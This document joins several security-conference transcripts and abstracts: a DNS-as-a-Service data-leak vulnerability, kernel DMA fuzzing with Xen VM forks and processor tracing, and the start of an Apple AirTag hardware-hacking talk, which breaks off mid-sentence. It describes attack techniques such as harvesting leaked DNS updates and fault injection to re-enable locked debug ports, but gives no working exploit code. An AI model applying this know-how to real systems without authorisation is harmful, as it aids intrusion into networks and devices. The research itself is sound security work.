DNS. What was it was? Why is it actually the DNS was built as a protocol like 20 years ago for unfairness networks. Why are we still seeing it outside in the Internet? What are the implications of this protocol still being active on the Internet and potentially endangering both the endpoints and the DNS servers, right? So this is so much here that we see as potential research areas for us and also for the community. And we believe the scope here is huge because it's not a single service we found it across multiple DNS providers and we are pretty sure that this one will be in many others. We probably impact many, many, many of those DNS providers. Thank you very much, guys.
|
We present a novel class of DNS vulnerabilities that affects multiple DNS-as-a-Service (DNSaaS) providers. The vulnerabilities have been proven and successfully exploited on three major cloud providers including AWS Route 53 and may affect many others. Successful exploitation of the vulnerabilities may allow exfiltration of sensitive information from service customers' corporate networks. The leaked information contains internal and external IP addresses, computer names, and sometimes NTLM hashes. The number of organizations vulnerable to this weakness is shocking. Over a few hours of DNS sniffing, we received sensitive information carried by DNS update queries from ~1M Windows endpoints from around 15,000 potentially vulnerable companies, including 15 Fortune 500 companies. In some organizations, there were more than 20,000 endpoints that actively leaked their information out of the organization. We will review possible mitigations to this problem and solutions for both DNSaaS providers and managed networks. REFERENCES: I. Microsoft Windows DNS Update algorithm explained - https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003 II. An excellent blog post by Matthew Bryant on hijacking DNS Updates abusing a dangling domain issue on Guatemala State's Top Level Domain - https://thehackerblog.com/hacking-guatemalas-dns-spying-on-active-directory-users-by-exploiting-a-tld-misconfiguration/
|
10.5446/54240 (DOI)
|
Hi everyone, thank you for joining my talk, Fuzzing Linux with Zen. My name is Tom Ashlandiel and I'm a Senior Security Researcher at Intel and I also maintain a variety of open source tools such as the Zen Hypervisor, LibVMI, DropWoof and I also participate in the HoneyNet project where we usually run Google Summer Code projects during the summer developing open source tools to fight against malware. What this talk is about is that we had this task of fuzzing the device-facing input points of several Linux kernel modules, kernel drivers, and we had to build new tools to get it done. We open-sourced them, we found a bunch of bugs and fixed them, I will talk about those, but really the point of this talk is to show you how we did it so you can go out and do it yourself. To start, let's talk a little bit about feedback fuzzers. They are not just about feeding random input to your target, they use feedback as a mechanism to better exercise your target code and they do it by effectively collecting the execution log or called the coverage when you are running the fuzzer and you can use that to compare execution from run to run to determine if the fuzzer was able to discover some new code that hasn't been seen before. The idea is simply that if you discovered some new code region that hasn't been exercised before, it's worthwhile to focus on that because the chances of finding some new bugs is higher on code that hasn't been exercised as much. Obviously, what feedback fuzzers need the most is determinism. If the target code behaves radically differently from one run to the other, then the fuzzer might just get stuck in focusing on inputs that don't actually lead anywhere because it will think that it's opening up new code paths when it's in fact just noise. So if you have garbage in, you will have garbage out. So Zen VM forking is supposed to address that shortcoming. It is effectively a way to add determinism to kernel code execution. If you think about the kernel, it's pretty undeterministic. You have interrupts firing all the time, you have multiple threads and scheduling. It's as far away from deterministic execution as you can get. So VM forking allows you to split the runtime of a VM into multiple VMs and populate the memory of these fork VMs from the parent one. So to make this as fast as possible, you effectively can just, when the fork is executing a memory access where it's a read or an execution, you can just populate those page table entries in the fork with a shared page table entry and you only have to actually deduplicate the entire page of memory if the fork is writing something into memory. To get even better speed, once you have a fork VM set up, you can actually just reset the state of that fork VM, just copy the VCP registers from the parent and throw away any of the deduplicated copied pages, but keep the shared pages in place that will get you the best performance. If you take a look at numbers, if you run these operations in a tight loop, you can create about 1300 VMs per second. If you are doing a reset, that's about 9000 resets per second. So these numbers are fairly okay for fuzzing. Obviously, you will not see these numbers because these are the theoretical max if you are doing nothing just resetting the VM. Obviously, between those resets, you actually want to run your target code. A couple other building blocks to mention here to really understand what we will be doing is most importantly, Zens introspection subsystem. So this is what I've been working on for the last 10 years. It allows you to really peek into the runtime execution state of a guest. You can read and write the memory, translate virtual addresses, but it also allows you to pause the VCP of the VM at various hardware events and get a notification of those hardware events in your regular user space application in DOM zero, which makes development of introspection tools really quite convenient. You can get notification of CPIDs, breakpoints, single-stepping, EPP faults, and a bunch of other things. The other really cool feature that just got upstreamed into Zen is called VM trace. We did this in collaboration with the Polish cert and Citrix, and this is an effective way of turning on Intel processor trace to record the execution of a full VM from DOM zero, where the CPU itself will store enough information about the execution of the VM in a bit low overhead so that later on that log can be decoded to reconstruct the execution of that VM, see what happened. And obviously, this is what we will be using to collect the coverage information. So if we look at the full flow of how the fuzzing setup is working on Zen, if you start from the parent VM, you boot up your regular VM, and then the target code is reached, you compile the target code with the magic CPU ID in place that will signal to the fuzzer that this is the point you want to start fuzzing, the fuzzer will find that CPU ID when it executed will create a fork, which we call the sync VM. In that sync VM, we look up the virtual address of various kernel functions that usually get called and something bad is about to happen in the kernel, such as a panic is happening, Kassan or Ubison built in error detection systems in the Linux kernel trip. We add a breakpoint to the entry of all of those functions, and we create another fork. This is what we call the fuzz VM. This is where we will actually be performing the fuzzing. This works effectively by taking the input that's generated by the fuzzer. In this case, we are using the AFL, American FuzzyLob. We take the input that's generated by the fuzzer and we write it straight into the VM's memory, un-posit, see what happens. If we catch a breakpoint, that's going to be at one of those entry addresses that we breakpointed earlier. Great. We just found a crash that we would report back to AFL. If we catch the magic CPU ID again, that would be the end harness. So you have a start harness and an end harness. If you hit the end harness, then nothing bad happened. If neither, then we report a timeout. Afterwards, we can take a look at the Intel processor trace log, decode it, and we use that to report the coverage back to AFL so that it will understand if something new happened while fuzzing that VM. And then we just reset the state and go to the next input from AFL. Let's take a look at the demo of how this actually looks in practice. I am creating an Ubuntu 20.04 VM and I will be booting a Ubuntu Linux 5.10 kernel that has the harness already compiled into it. I'm booting with KSLR and PTI disabled just to make debugging easier later on. And what we will be fuzzing is a USB driver in that kernel. I effectively have a TomDrive USB stick attached to a USB3 hub. And I fire up the GFX fuzzer to listen to when that magic CPU ID, which in here is called magic mark, is executed. So now it's just listening to see when that CPU ID happens. The VM finished booting, I will log in and we'll initiate some interaction with that USB TomDrive that will trigger that harness I have pre-compiled in there. So I ran fdisk and you see that fdisk never returned, it never finished. And that is because that VM is now paused because the KFX caught that CPU ID. And we have the information about where the target buffer and the target size is that we want to fuzz. We can go to that virtual address, read out that memory to be used as the seed for the fuzzer. So this is the normal execution would be that the kernel was just about to do while executing the fdisk. And we will start mutating from that structure to see what can happen if that input is malformed or malicious. We will be using the FF++ here, fuzzer is up and running. We are opening up a bunch of paths as you can see. And in less than a minute, there is already a crash found. And we will go into the details of what this crash is about, but this is actually a real bug in the Linux kernel that was discovered just like that. So at this point you are probably wondering, okay, what the hell did we just fuzz and what the bug is, and you are right. There is more to fuzzing than just running the fuzzer. In this engagement we discovered that really the biggest pain point is not running the fuzzer. Once the fuzzer is up and running, it is great. You can go and take a walk, grab a coffee, it is awesome. You don't really have much to do. It is all automated. The real pain point is performing the analysis, figuring out what to fuzz in the first place. And then once the fuzzer finds something, getting enough information out about the crash so that you can create a report or fix the bug. So how do we do all of those steps? So let's start with analysis. What we were fuzzing there is DMA. And DMA is memory that the kernel makes accessible to an external device. And this is to facilitate fast IWO operations. In memory you have better speed. And the way this works is that the device has direct access to that memory so that it doesn't have to go through the CPU and the MMU to actually read or write to that memory. There is what's called the IOMMU. But usually the IOMMU restricts access to other pages. Pages that are explicitly made accessible by the kernel to the device will be allowed to be accessed by the device through the IOMMU. So the IOMMU is not going to protect you against a malicious device that is placing random stuff on the DMA page that it's allowed to do. So we figured, okay, let's take a look at the Linux source code, see where DMA memory is getting accessed. It should not be too bad, right? Like when you have a system called what the kernel is doing, when it receives some buffer from user space, the first thing it does is it copies it into the kernel memory and does its processing there. So we figured, well, that's how DMA works as well. The kernel should copy the DMA memory first to an internal buffer and go from there. But boy, where are we wrong? It turns out that the kernel is accessing DMA memory all over the place. There is no single function that copy from DMA. Once DMA memory is established, the kernel can access that and does access it all over the place. So even just figuring out where Linux reads from DMA is not trivial. So what we did was we looked through the source code looking for hints of when the kernel might be doing a DMA read. And it's quite painful because just by looking at the source code, you don't necessarily know whether some pointer is a DMA memory or not. So what we did, we looked for the IOMM cookie or the best one was actually to look at the NDNS conversion functions that go big NDN, little NDN to CPU. That is a pretty clear indication that the memory that is being, or the data that is being read might not be in the right NDN format that the CPU expects. So that usually means that there was some cross communication with an external device. And then take the output from Ftrace, which is a built-in subsystem in Linux that allows you to trace the execution of the kernel internally, cross reference what we found that we think is DMA access and see that better those functions actually get called during execution of the kernel. Because we found a bunch of these accesses, but those were functions that never actually executed during runtime. And those are not really good targets to fuzz because if you can't get the code to execute, then you can fuzz it. So this was not great. So we also decided to just be old school and dig through the spec. Maybe we get a better understanding of what's going on here because the kernel code is not the easiest thing to read. So looking at the spec itself, we can find pictures like this that are immensely helpful to try to understand what the hell is going on. Obviously, this subsystem, as you can see, is quite complex. But really, the biggest boost that we got for our engagement here was to just discover what the name of the rings are that this subsystem uses for device to kernel communication. And these are the event ring transfer rings and the command ring. So just knowing those names, we were able to just grab whether there is a variable called event ring and see where that is being accessed. So what we found is this location where, yeah, there is what's called the event ring. And this is a function that gets called from the interrupt handler. Obviously what happens is that the device or the USB hub is placing some data on this ring and sends an interrupt. And then the kernel goes and processes whatever structure that the device sent. And it dequeues that from that ring page, which is DMA accessible. So what we just fuzzed, what the harness setup was, is just after that structure is dequeued from the DMA page, we have the harness start and the transfer information about where the pointer is and what the size of the structure is. And then we have a couple of points that we want to stop the fuzzer and go to the next iteration. Effectively, whenever this function would return, we want to stop the fuzzer. We want to fuzz everything that's in this function and whatever this function calls. As for what those harness functions actually look like, they are really just the CPU ID instruction, where we stuff the magic information into registers that the user space tool in DOM zero that can receive. So these are effective. You can think of them as hypercalls. All right. So once we found that bug, what's the next step? With VM forks are a little special on Zen in that they are not fully functional VMs. You can turn them into fully functional VMs, but for fuzzing, it's obviously there's no point. But because of that, there's a little bit of pain in actually figuring out what happened in them because you don't get to just log in and gather the logs because there's no network, there's no disk, no console, there's no IO into VM forks. They are literally just running with CPU and memory. But fortunately, the dmessage buffer that the Linux kernel uses to store information about runtime events and errors and whatnot is just sitting in RAM. So we can go and carve it out. The way we do that is we're going to use GDB SX that's been shipping with Zen for over a decade at this point. And it's really just the minimal GDB bridge. If you build the kernel with debug information and frame pointers, you can access the information of the kernel state using just GDB. So let's take a look at how this works. So this is where we were. We just found the bug. We want to figure out what happened, what is the bug. So we'll take KFX, we'll re-execute, but instead of taking the input from AFL, we'll just use that file that was found by AFL, we'll inject it into a VM fork and see what happened with the debug output. We see that, okay, Ubisoft Prologue tripped. So Ubisoft Prologue is the function that gets called when the kernel starts to construct the Ubisoft report. So we want to stop the VM fork after it actually finished printing the Ubisoft report into the dmessage buffer. So we will stop at Ubisoft epilogue. And at that point, we can really just attach the debugger to it and read out the dmessage buffer. So I fire up GDB SX, attach it to the domain, go into the source folder where I compiled that kernel, load up the symbol file for the kernel, attach to that bridge, and print the dmessage buffer using lx-dmessage. And there we go. Right at the bottom of the dmessage buffer, we see the report that Ubisoft generated for the bug that the fuzzer just found. This is an array index out of bounds error in xhci ring. Awesome. So this is pretty much how you triage the errors that you find using the fuzzer. For most of the cases, this has been perfectly sufficient, right? We have the source line that we have to take a look at. Usually it's pretty straightforward of where the bug is coming from, but not all the time. Sometimes the bug triggers a code that's far away from the driver that we are actually fuzzing, right? So there is some call chain from the start point that we are fuzzing from that reaches some deep layer of the kernel. And that's where some bug happens, then figuring out what's going on there is a little bit more difficult. So let's look at triaging beyond the basics. Here is the harness that we use to fuzz the IGB network driver. So these are network drivers that receive packets and packets. Here we have an interrupt handler of when a packet is received by the kernel. And the kernel goes and reads this Rx description buffer that the device places on the ring that has information about what size of the packet that was just received is. So this is not the packet itself. This is metadata about the packet that the device itself constructs. And we want to fuzz that. So what we do is we jump in just after that Rx description buffer was received from the ring. We'll start fuzzing there and we want to stop fuzzing when the loop loops around. We also have a harness stop when that loop breaks out. That's not shown here. So using this harness, we found the following bug. We get a Kassan node pointer D reference in a function called GRO pull from frag zero. All right. We also get a helpful stack called trace where we see that there is Kassan report and just before that there is a mem copy. So GRO pull from frag zero calls mem copy. All right. Let's take a look at that function. It turns out that this is not in IGB itself. This is in net slash core slash dev.c. So this is some deep layer of the Linux networking stack where it receives this SKB buff structure and does a mem copy from one place to another. We have no clue what those are, but this mem copy obviously trips a null pointer D reference. So it's either the source or the destination is corrupt. And it got corrupted because the fuzzer found a way to corrupt it. So at this point, the idea I had was, all right, let's take a look which one of these pointers is the culprit. We would want to stop the execution of a VM fork just at that mem copy. So we would be able to take a look at the state of the VM, the registers that contain those pointers to see which one is null. So we want to stop the execution at that mem copy. The way we do this, it has a couple steps. And we need a couple bits of information for it. First of all, we want to figure out what is the address of Cassand report because that's where we want to execute that VM opt tail using single stepping because just before Cassand report is reached, obviously we'll have the mem copy. So what we do is we just execute the VM with that crashing input and we see that Cassand report is indeed tripped and we see the virtual address of that function, Cassand report where it is. So we want to at this point create a VM fork, place that buffer that we know that will trip Cassand report into that memory. So we will use this tool called RWM and we will write the contents of that file into the target buffer. And that will allow us to execute this VM to reach the crashing input and record what happened. Obviously we could use processor trace as well for it, but I found single stepping to be just as effective and it's a little less convoluted. So now we have that VM fork set up with that crashing input injected into its memory. So now we just use the tool stepper that will use MTF single stepping to go all the way and stop at the virtual address of Cassand report when that's reached. And we will pipe the output of that into a file. And if you take a look at what this file contains, so this is effectively just the disassembly of each instruction that executed and this reaches Cassand record at the end. So there is a ton of instructions in there. Just looking at that is not all that helpful for the task we are trying to do, but what we can take from that is really just take the instruction pointers that we're observed and translate it using the kernels debug symbols using address to line. That will actually get us the source lines of what each of those instructions actually are. So now if you take a look at this decoded log, what we will see is that each instruction pointer and what source line it corresponds to. So at the bottom of this file we see immediately, so that's where g.r.r. pool from Frank zero is and there is the mem copy that trips the rule pointer dereference. So I just take the last instruction that's still at the mem copy before Cassand report trips and I want to re-execute that VM to stop at that mem copy, the last instruction in that mem copy to be able to see what the register state is. So again, I just create a fork. I use RWM, same way as before, and just change the domain ID. Now I want to stop on this address, which is the mem copies address. I don't actually need to save the output because I know where it's going. But now this domain ID 61 is paused at that mem copy so I can just go and take a look at the register state, take a look at the source pointer, RSI is the register that holds the source pointer in this case and RDI holds the destination one. Oh, well, it kind of looks like both source and destination in that mem copy is a null pointer. So they are both corrupted. So this approach did not really yield us anything that we could use to figure out what went wrong since it looks like that entire SKB buffer is just bogus. So what else can we do? Well, the idea is that, well, if we can't figure out just at the mem copy what went wrong at the location where the bog trips is, we can compare the execution that goes to CASAN report with the execution that is normal. So we can take the normal input that was used as the seed. We know that this is the input that the kernel would have executed with normally and that does not cause a crash. We see that it reaches the harness signal on finish. So we will just create a fork from that, use stepper to go all the way to the end harness. Just as we did before, we'll stop on this address, save the output to a log file. Now we can take the instruction pointers from this log file, decode it using address to line, save that as well. And now we have the decoded log for both the execution that goes to CASAN report and that goes to the end harness and we can just diff them. The very first line in this diff is going to be where the execution diverges from the normal one. And we have the source line. You can just go straight there, look at the code and bam, this is the first line in this execution that only happens when the fuzzer, with the input that the fuzzer found. So it turns out that the SKB buffer is constructed by the driver and it's being passed to those deeper layer kernel subsystems. But the way it gets constructed here is based on information that came from that Rx description buffer and it's bogus. So obviously what needs to happen is that even if that Rx description buffer says that oh, there is this bit set, there needs to be a little bit more sanity checking in place before that SKB structure is manipulated. So if you actually look at the latest kernel code, you will find that this code has been fixed and it's effectively was just missing a sanity check on data that was coming from DMA. All right, let's look at a couple more bugs just for fun. Can you spot the bug here? How about this one? If you haven't noticed yet, but kind of the team of these bugs is about the same. You get some DMA source input that is used without input validation and is just used for whatever the kernel decides, in this case for example, this is used as the slot ID is derived from DMA memory and is used for an array index. What can go wrong there? So yeah, we found nine 0.3 D references, three array index out of bounds. We found some infinite loops in the interrupt handlers, but also during boot, the kernel can trip with user memory access as well, which is not great. And these are all pretty much stemmed from the same problem in that the kernel does not treat DMA memory as a security boundary. DMA memory is kind of treated trusted and consequently it means that all of these devices are treated trusted and when you are talking about USB devices, well, it's not great that all the USB devices are treated like that. Another problem, case that we wanted to look at is when these kernel codes might perform double fetches. Double fetch is effectively a race condition where you can have problems where you have time of check to time of use, where the kernel is performing, even if it did perform some sanity checks on memory that's DMA, the problem would be that even if you use sanity checks on DMA, accessible memory, by the time you finish your sanity checks, that data might have changed underneath because the device has access to that same memory. So if it wins the race, you might finish security checks, but the data is still corrupt. So obviously we wanted to detect if that happens. The idea was to, okay, let's remove VPP permission from DMA pages and just create a record of when DMA pages are being accessed and if we get a page fault where the kernel is reading some address from DMA and it's the same page with the same offset twice in a row, that's the strictest definition of a double fetch. We can detect that and report that as a crash to the FL so we can go and take a look at the code to see whether the double fetch is a security concern. We thought it would be rare, but it turns out that it happens all over the place. Some kernel drivers, three DMA memory as totally trusted, so they would just keep going back and fetching the same memory left and right. But so far we haven't found a strictly speaking security issue because it turns out that the same byte is being fetched, but different bits are used from that byte. So far it hasn't looked dangerous, but obviously this practice of just treating DMA memory is bad and it needs to change, but we've received considerable pushback from kernel maintainers for various reasons, performance, regressions, fear of regressions, but ultimately to close this class of bugs, DMA memory should really be treated the same way as user space memory is. Every DMA memory should get copied into a local buffer before being used by the kernel and that's absolutely not the case today. All right, so we found a bunch of bugs, we fixed them, mission accomplished, right? Not so fast. As you recall, the way we found the DMA input points was just through reading the source code and doing some experiments with F trace, but there was this lingering feeling of like, hey, did they really discover all DMA input points? What data do we have to back that argument? And I mean, we had a bunch of people look at the code, so that gave us some confidence, but we couldn't put a number on it. We also got bugged on by just documenting all the bugs we found and at some point it just became non-productive to keep staring at the code because it was just annoying. So let's do better. This tool called DMA monitor, we added to the project to be a standalone EPP fault monitoring tool. So this effectively came after the double fetch detection code was added and the idea is that well, if we can already detect when DMA is being accessed for double fetches, well, we can use the same approach to detect when DMA is being accessed at all, right? We can really just trace who is accessing DMA and where by using EPP faults. The only thing we need is to know where the DMA pages are. Fortunately, the Linux kernel has its own internal DMA API that all kernel modules should be using to set up DMA for devices. And in that there is a function that is used to allocate memory to be used for DMA. DMA alloc attributes. We can hook that function using a breakpoint through the hypervisor and hook the return address when the function finishes and that will get us the virtual address of all pages that the kernel uses for DMA. And then we can just remove the EPP permission for all those pages on the fly, effectively giving us a way to log all the code sites that read from DMA as the kernel is running. So let's take a look at how this works in practice. I'm booting up the same VM and on the right I'm firing up DMA monitor. I just tell it what is the domain and debug JSON of the kernel is. DMA alloc attributes is hooked as the kernel is booting and then we pretty much immediately start to see a ton of DMA accesses happening as the kernel is still booting. As you can see there are quite a few pages allocated for DMA and we can grab through that log and see when the access is just a read access. We can take the instruction pointer for each sort through them and just take the unique ones. There's still a ton of them but we can feed this through address to line to get an explicit list of all the places that the kernel touched DMA from. So this is quite a few places but at least now we have an explicit list that we need to go through and take a look and see whether the data that is being read from DMA at these locations is complex enough to warrant fuzzing which is awesome. We didn't have to look at the source code to figure out where to start. So this is miles better than what we were doing before because we just have the list that we have to take a look at instead of having to keep parsing everything in the kernel to see whether that's DMA access or not. There were still some corner cases in the DMA monitor either though it's way better than what we were doing before and that's because some of the times the DMA access that the kernel is doing is just reading something from DMA and stashing it into some structure and returning and then the kernel is going away and doing something else. So we are like okay well there is that data going to get used after the DMA access nothing warranted fuzzing but that data is still sitting now in the kernel, in private kernel memory but it still can be potentially malicious. So where is it getting used and is it safe and we are like well we have no idea. We didn't want to go back reading the source code because it's very hard to follow that type of data life cycle in the kernel and it's very error prone and it's very manual and annoying. So that's where this next tool idea came from that we call fully obtained analysis. The goal is to really just track the tainted data propagation in the kernel. We know where the data is coming from right, we have the source that's the DMA access so we want to taint that address and track what the kernel is doing with the data and where the data lands and how it affects the execution of the kernel. We will use VM trace aka Intel processor trace to record the execution of the kernel with very low overhead and after some time replay that recorded the instruction stream through the Triton DBI's taint engine. So that's a separate open source project that's really awesome that we integrate with and that will tell us what instruction pointers get tainted by that data that we just read from DMA and that will tell us all the locations where the control flow of the kernel depends on tainted data. So let's take a look at this as well. Here is a VM fork that I know will perform a DMA access at this page. So I will fire up DMA monitor on it, I'll pause it and yes we see there is a single DMA access to that page where something was read out from the DMA and stored somewhere in the kernel. So we don't know at this point where else that data is getting used. So now the idea is to use VM taint to figure that out. We will use VM taint to save the state first. So this saves the stack and the resistors of the starting point into a file that we all need for the taint engine. We create another fork, we start the collection of the processor trace buffer, we pipe that into a file and on pause the VM fork. Now it's running and it's recording the execution into that buffer. We do that for a second or two, we pause it and we can start decoding that processor trace and feed it through the taint engine, pipe it into the taint.log file and take a look while that is processing what it found so far. So right off the bat we see where that move copied the data, what register got tainted and from there where else, what else got tainted during the execution of the kernel. And there we go. Right off the bat we can see all the different instruction pointers that got tainted from just that single DMA access. And if you do this for the boot of the kernel, you can really check the full life cycle of DMA source data through the execution of the kernel without even having to open up the source code of the kernel and just giving you right away all the locations that the control flow might depend on tainted data. You go take a look if it looks complex enough, you put the harness around it and you can start the fuzzer. So this code is released as well as everything else. Most of the code is upstream in Zen, but this code you can grab from GitHub. There are also a couple goodies that I wanted to mention. This is pretty new. Some of the targets that we wanted to fuzz were kind of difficult to get working in a Zen VM. So we came up with this way of being able to transplant the state of the system from one hypervisor to another. So in this case, you can take a snapshot on KVM or CEMEX and load it up on Zen because VM forks really only need the CPU, state and the memory of your target to be fuzzable. So you can use all of those different hypervisors to take a snapshot and load it up on Zen and fuzz away. Couple things we want to work on next or already are working on. Top of the list is automation. Putting an end-to-end, you know, automated fuzzing system together is what everyone is asking about. So that's absolutely something we are looking at. It would be also pretty awesome to capture system state using Intel DCI, which is a USB 3-based debug connection that you can attach to a bare metal system and capture the full system state. This would allow us to, you know, really fuzz any code that runs on any system, including BIOS and SMM code. So this would be pretty cool. Another idea we have is creating the Senseif to Ring Zero mode tool, adding nested virtualization support so we can fuzz hypervisors, obviously with Intel DCI we would be able to capture hypervisor state as well, so that might not necessarily be a requirement, but still would be cool to have. And couple things I didn't cover in this talk that are already possible using VM forking and all the tools that are available open source, like fuzzing other operating systems, fuzzing Zen, user space binaries are absolutely something you can fuzz with this system. Black box binaries and even malware. So if you're looking for ideas, here's a couple things that are already possible. So thank you. That was my talk. If you have any questions or comments, please reach out. And you know, thanks goes to a whole bunch of people who made this work possible. So this was not, you know, a single person's job. This was, you know, large teams working on this. So thanks everyone for your involvement and absolutely for the open source community for releasing all the tools that make, you know, rapid security development like this possible. So thanks. I hope you found, you know, some cool information in this talk and, you know, the goal here is to get you to go out and go fuzz the kernel because we found some bugs, but you can bet there are more to be found. So thank you. I'm looking forward to your questions.
|
Last year we've successfully upstreamed a new feature to Xen that allows high-speed fuzzing of virtual machines (VMs) using VM-forking. Recently through collaboration with the Xen community external monitoring of VMs via Intel(r) Processor Trace has also been upstreamed. Combined with the native Virtual Machine Introspection (VMI) capability Xen now provides a unique platform for fuzzing and binary analysis. To illustrate the power of the platform we'll present the details of a real-world fuzzing operation that targeted Linux kernel-modules from an attack-vector that has previously been hard to reach: memory exposed to devices via Direct Memory Access (DMA) for fast I/O. If the input the kernel reads from DMA-exposed memory is malformed or malicious - what could happen? So far we discovered: 9 NULL-pointer dereferences; 3 array index out-of-bound accesses; 2 infinite-loops in IRQ context and 2 instances of tricking the kernel into accessing user-memory but thinking it is kernel memory. The bugs have been in Linux for many years and were found in kernel modules used by millions of devices. All bugs are now fixed upstream. This talk will walk you through how the bugs were found: what process we went through to identify the right code-locations; how we analyzed the kernel source and how we analyzed the runtime of the kernel with Xen to pinpoint the input points that read from DMA. The talk will explain the steps required to attach a debugger through the hypervisor to collect kernel crash logs and how to perform triaging of bugs via VM-fork execution-replay, a novel technique akin to time-travel debugging. Finally, we'll close with the release of a new open-source tool to perform full-VM taint analysis using Xen and Intel(r) Processor Trace. REFERENCES: https://github.com/intel/kernel-fuzzer-for-xen-project https://www.youtube.com/watch?v=3MYo8ctD_aU
|
10.5446/54241 (DOI)
|
Hey, welcome to my talk Hacking the Apple Air Tax. My name is Thomas Roth, I'm a security researcher from Germany and I also run a YouTube channel called Stack Smashing where I talk about reverse engineering, hardware hacking and all that kind of stuff. If you want to contact me, you can find me on Twitter at GhidroNinja and hope you enjoy this presentation. Now before we start, let's quickly talk about what I will talk about in the next few minutes. So, first off, all the texts that you will see are local texts and they all require hardware access and so I will not show any drive-by exploits or anything that can be exploited over Bluetooth or so. Second of all, a lot of the info in this talk is based on reverse engineering and so there might be minor mistakes, I might get something wrong or so and so the devil is always in the details and as I don't have access to the source, everything is really based on reverse engineering and so on. And my real goal with this is to just have some fun with hardware hacking and explore a device in a fun way. Now as always, this kind of work is not possible without a lot of other people and so there are a couple of people that I want to thank. First off, Colin Oflin who is one of the persons that not sniped me with the Air Tax in the first place, second of all, Leonard Wouter and Plunk who I did a lot of reverse engineering with and who I did a lot of experiments with and so on. Jeska Klasen who gave me a lot of information on the Apple U1 chip and helped me a bit with some artiquette details. David Halton who provided very in-depth images of chips and provided de-layering of the PCB and so on and also limited results with out whom a lot of the work you are about to see would not be possible because he found the actual vulnerability in the NRI 52 last year. Now before we jump in, let's talk about the Air Tax itself. Now the Air Tax is a Bluetooth keyfinder so really nothing too special at least I thought so when I first saw it. But what's unique about the Air Tax is that it contains ultra-white band via the so-called U1 chip. Ultra-white band is a technology that can allow for example iPhones that have ultra-white band to very precisely locate the Air Tax and we're talking like centimeter precise including direction finding and so on here. So this is something really neat and ultra-white band works in like I think the 5 to 6 GHz range and so it's really high frequency and very difficult to analyze using cheap equipment and so you really need very high end SDRs and so on to analyze it but now we have a very cheap device that contains this U1 chip that we can potentially use for research on ultra-white band. The second cool feature is the Find My Network and so basically when you use the Apple Air Tax any iPhone that goes into the Bluetooth range of it will report the location of your Air Tax to Apple servers and this is all done with privacy in mind. I don't really know too much about it but it's a really cool feature because if you let's say lose your Air Tax in France you'll be able to locate it from Germany as long as any iPhone walks past. I also think it's funny because Wikipedia says that it's a keyfinder but you know it doesn't actually attach to a key without separate accessories. Now given all this I was pretty uninterested in the Air Tax and I didn't buy any and so on and I really had zero interest in them. That is until one morning I wake up and I get a message, hey here are the flash contents of the Air Tax and attached to that message was a dump of the spy flash of the Air Tax. Now being a hardware hacker I obviously at least had to peek inside of this dump and so I ran hackstump on it and I immediately saw this and so you might see those strings on the right side here and if you read them backwards you might see that they basically spell out things such as firm root or NV RAM root, CRLG root and so on and so forth. And if you've worked with Apple embedded devices you might immediately recognize this as being the F-Tap of an RT-Kit firmware. RT-Kit is the embedded operating system that Apple uses in a lot of very small devices such as the AirPods. And if you ever see such a firmware and you want to extract it you can use a tool called F-Tap Dump which makes it really really easy. Now knowing that this runs RT-Kit already made it slightly more interesting to me but after digging into this for a bit it turns out that this firmware is actually the E1 firmware and so that's really interesting. Then scrolling further through the hackstump I also discovered a couple of function names such as nif underscore f-storage init, nif f-storage write, nif f-storage erase and so on and so forth. And that is nif52 code. Now nif52 is a very common microcontroller family that you can basically find in almost any keyfinder device. And so I'm very familiar with this chip and so I thought that was kind of interesting. And so after realizing that maybe the RTX are a good platform to analyze the E1, play with E1 firmware, have a look at the nif firmware and so on I was nerd sniped and I knew that I need to buy an RTX. So I went to the Apple store and I grabbed a couple of RTX and I tried to open one up by you know, prying open the backside and I immediately broke it. Like I somehow ripped off this inductor because the RTX are really really sensitive when you try to open them. They have a very thin PCB and if you nudge on the wrong side of it you will destroy it. So if you try to open up an RTX at home always try to use these three points. It's basically where the battery compartment screws into the backside of the device and there it's relatively safe to open up the RTX. And so after destroying my first RTX in literally the first minute that I unpacked it, I managed to open a second one and this is basically what you see. You have a device with a ton of test points and so on, a couple of passives such as capacitors, the battery contacts and the big coil in the middle which is actually the speaker of the RTX. And nothing really interesting except this small chip on the bottom right here. This is the accelerometer and we will have some fun with that one later on. If you remove the PCB which is really annoying because you basically have to pry it out because it's all glued very tightly into the RTX, you will get to see this and this is the interesting side because this is where all the integrated circuits, controllers and so on are. Let's start with the biggest one. This big silver chip here is the Apple U1 chip, the ultra white band chip. And if you look next to it, we have the nice antenna connector. Now what's interesting about the U1 chip is that so far it was only available in very expensive devices such as the iPhone or the Apple Watch or so. Not really in a price range where you can buy 10 soldered out U1 and then experiment with it. But now with the RTX, we have an U1 available for like 30 or 40 bucks. And so this is I think really going to be interesting and I think we will see a lot of research with the U1 chip from the Apple RTX. To the left of the U1 chip, we have the spy flash and this is the spy flash that I got the dump to that nerds night me towards the RTX in the first place. To the left of the spy flash, we have the NIF 52, the Cortex and microcontroller. Now this microcontroller is super common in any IoT device nowadays. And so it was clear that this chip would handle Bluetooth, most probably the iPhone communication, NFC and it's also known to be vulnerable to a fault injection attack. And so basically this chip can be locked down so you can prevent people from debugging it. But there's a non-vulnerability found by limited results that allows us to resurrect the debug interface using fault injection as you will see in a bit. And so at this point in time, having the attack open and seeing the NF 52, the plan for me at least was clear. Find the test pads and pins to connect an SWD programmer to the device, unlock the chip using fault injection and then hopefully gain access to the firmware to be able to analyze it and see how does the attack work. Is all the logic in the NF 52, is all the logic may be done in the U1 and the NF just acts as kind of a modem or so. And so I was really curious at this point in time to see what is actually running on the NF 52. Now normally when you open a new device, now normally when you open a new device, you have to probe all those pins and so on and figure out which one is actually the SWD interface and you have to solder off components because the NF for example doesn't really have any contacts you can probe and so on. But luckily for me, Colin of Flynn already did all that work. And so on his Twitter, you can see that he created this nicely annotated version of the attack and he also found out which test pads on the backside of the attack are the pads that we need to connect our debugger to. And he also already tried to program the debugger and he also already tried to program the and he also already tried to program the NF 52 and found out that indeed Apple had locked down the debugging interface. Now this numbering scheme that Colin created kind of became standard in the attack hacking scene. And so if you are looking for some info on the attacks and you see like some pin numbers also somewhere, this is probably the numbering scheme that everyone is referencing to. And thanks to Colin, we know that pin 35 and 36 are the pins to which we can connect an SWD programmer such as a J-Link or a cheap ST-Link or so. And via those pins, we will be able to reprogram the attack. Now as mentioned, the debugging interface on the attack is unfortunately locked down using a feature called AP Protect. And this one will basically lock down the control access point for debugging and you can still erase the chip which will re-enable debugging and you can program it, but then you lose the firmware. And so while we could put our own firmware on it, at this point in time, it was much 